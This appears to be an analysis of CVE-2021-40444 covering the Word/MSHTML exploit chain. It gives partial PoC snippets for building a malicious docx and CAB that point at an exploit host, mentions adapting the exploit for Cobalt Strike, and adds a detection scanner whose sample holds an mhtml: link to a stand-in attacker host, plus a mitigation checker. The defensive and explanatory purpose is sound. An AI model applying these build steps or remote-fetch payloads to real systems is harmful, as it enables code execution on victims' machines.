CVE-2021-40444 vulnerability background
MSHTML (also known as Trident) is the browser engine of Microsoft's Internet Explorer; it is also used by Office applications to render web-hosted content inside Word, Excel or PowerPoint documents. ActiveX controls are a product of Microsoft's COM architecture and are widely used in the Windows Office suite and in Internet Explorer; an ActiveX control is the means by which a document interacts with the MSHTML component.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
PoC execution flow
1: Create a malicious DLL, embed it into the Word document, and generate the corresponding *.cab and *.html
Configure Word to load MSHTML on open -> serverIP
Generating malicious docx file
    os.chdir('data/tmp_doc/')
    os.system('zip -r document.docx *')
Generating malicious CAB file
    cp word.dll msword.inf
    lcab '../msword.inf' out.cab
Set information on HTML exploit
    xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', srv_url + '/word.html')
    rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w')
    rels_pw.write(xml_content)
Key points
The malicious DLL is turned into a CAB file with lcab and served for remote download
The Word relationship file specifies the remote server address, so the document requests the malicious CAB
Final exploitation: Office -> GET /word.cab -> malicious code executes
Adapting the exploit to check in to Cobalt Strike
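The relationship file mentioned above (word/_rels/document.xml.rels) is also where a defender can look: a document that pulls content through MSHTML carries a relationship whose target points outside the package. The scanner below is an added example and not code from the original page or from the linked PoC; it builds a constructed minimal .docx in memory (the target host attacker.invalid is a placeholder that never resolves) and flags mhtml: targets and oleObject relationships marked External, while leaving ordinary external hyperlinks alone so the check stays quiet on normal documents.

```python
"""Scan a .docx for relationships that would make Word fetch remote content via MSHTML."""
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespace and relationship types (real values from the OOXML spec).
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL_TYPE = REL_BASE + "oleObject"


def classify(rel):
    """Return a reason string if a Relationship element is suspicious, else None.

    Ordinary hyperlinks are also TargetMode="External" with http(s) targets, so
    flagging every external URL would be noisy; flag only mhtml: targets (which
    are handed to MSHTML) and embedded OLE objects that point outside the package.
    """
    target = rel.get("Target", "")
    external = rel.get("TargetMode", "").lower() == "external"
    if target.lower().startswith("mhtml:"):
        return "mhtml: target handed to MSHTML"
    if external and rel.get("Type", "") == OLE_REL_TYPE:
        return "oleObject relationship with external target"
    return None


def scan_docx(docx):
    """docx: path or bytes of a .docx. Returns a list of finding dicts."""
    src = io.BytesIO(docx) if isinstance(docx, (bytes, bytearray)) else docx
    findings = []
    with zipfile.ZipFile(src) as zf:
        for name in zf.namelist():
            # Every .rels part under word/ (document, headers, footers, ...)
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                findings.append({"file": name, "id": None, "target": None,
                                 "reason": "unparseable .rels part"})
                continue
            for rel in root.iter(RELS_NS + "Relationship"):
                reason = classify(rel)
                if reason:
                    findings.append({"file": name, "id": rel.get("Id"),
                                     "target": rel.get("Target"), "reason": reason})
    return findings


def build_sample_docx(with_remote_ole=True):
    """Build a minimal in-memory .docx (constructed sample data, not a real exploit)."""
    rels = [
        f'<Relationship Id="rId1" Type="{REL_BASE}hyperlink" '
        'Target="https://example.com/" TargetMode="External"/>',
        f'<Relationship Id="rId3" Type="{REL_BASE}image" Target="media/image1.png"/>',
    ]
    if with_remote_ole:
        # Constructed suspicious entry: an OLE object whose target is an mhtml: URL.
        rels.insert(1,
                    f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
                    'Target="mhtml:http://attacker.invalid/word.html" TargetMode="External"/>')
    rels_xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<Relationships xmlns="{RELS_NS[1:-1]}">' + "".join(rels) + '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx()):
        print(finding)
```

Run it against a real file with scan_docx("suspect.docx"); the same loop can be pointed at a mail-gateway quarantine folder. The check is deliberately narrow (mhtml: targets and external OLE objects), which is what makes it usable in bulk without drowning in benign hyperlinks.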
Tips:
- sudo apt-get install lcab
- PoC: https://github.com/lockedbyte/CVE-2021-40444
- Affected versions:
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Defenses
Temporary mitigation
Disabling ActiveX control installation in all Internet Explorer zones mitigates this attack; this can be done with a registry file that disables ActiveX controls (back up the registry before proceeding):
1. Paste the contents of the box below into a text file and save it with the .reg file extension:
2. Double-click the .reg file to apply it to the policy hive.
3. Restart the system to ensure the new configuration is applied.
Note: the steps above set URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) and URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) to DISABLED (3) for all Internet zones, for both 64-bit and 32-bit processes. No new ActiveX controls will be installed; previously installed ActiveX controls continue to run.
To undo this mitigation:
Delete the registry keys that were added when applying it.
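After rolling the workaround out, a practitioner wants to confirm it actually landed on every host rather than trust that the .reg file was double-clicked. The script below is an added example, not part of the original page or of Microsoft's advisory; it checks the two URLACTION values the note above names for DISABLED (3) in each IE security zone. The policy key path and the zone numbering 0 to 3 are assumptions taken from Microsoft's published workaround, not from this page. The registry reader is injectable, so the decision logic runs anywhere (the test uses fake readers) while the Windows reader uses the standard winreg module.

```python
"""Check whether the IE ActiveX-download workaround for CVE-2021-40444 is applied."""
try:
    import winreg  # present only on Windows
except ImportError:  # lets the pure decision logic run on other platforms
    winreg = None

# Assumed layout of the workaround (not taken from the page): the policy hive key
# for each IE security zone, and the two URLACTION values the mitigation note names.
ZONES_KEY = r"SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
ZONE_IDS = (0, 1, 2, 3)  # Local Machine, Local Intranet, Trusted Sites, Internet
URLACTIONS = {
    "1001": "URLACTION_DOWNLOAD_SIGNED_ACTIVEX",
    "1004": "URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX",
}
DISABLED = 3


def registry_reader(zone, value_name):
    """Read HKLM\\<ZONES_KEY>\\<zone>\\<value_name>; None if absent or not a DWORD."""
    if winreg is None:
        raise RuntimeError("winreg is only available on Windows")
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, f"{ZONES_KEY}\\{zone}") as key:
            data, kind = winreg.QueryValueEx(key, value_name)
    except OSError:  # key or value missing
        return None
    return data if kind == winreg.REG_DWORD else None


def check_mitigation(read_value=registry_reader):
    """read_value(zone_id, value_name) -> int or None.

    Returns (applied, problems): applied is True only when every zone has both
    URLACTION values set to DISABLED (3); problems lists each deviation.
    """
    problems = []
    for zone in ZONE_IDS:
        for name, label in URLACTIONS.items():
            value = read_value(zone, name)
            if value != DISABLED:
                problems.append(
                    f"zone {zone}: {label} ({name}) is {value!r}, expected {DISABLED}")
    return (not problems), problems


if __name__ == "__main__":
    applied, problems = check_mitigation()
    print("mitigation applied" if applied else "\n".join(problems))
```

Because a missing value reads as None rather than raising, a host where the workaround was never applied reports eight problems instead of crashing, which is the behaviour you want when the script runs from a fleet-wide job. The same reader structure works for the undo step: after the keys are deleted, every value should read back as None again.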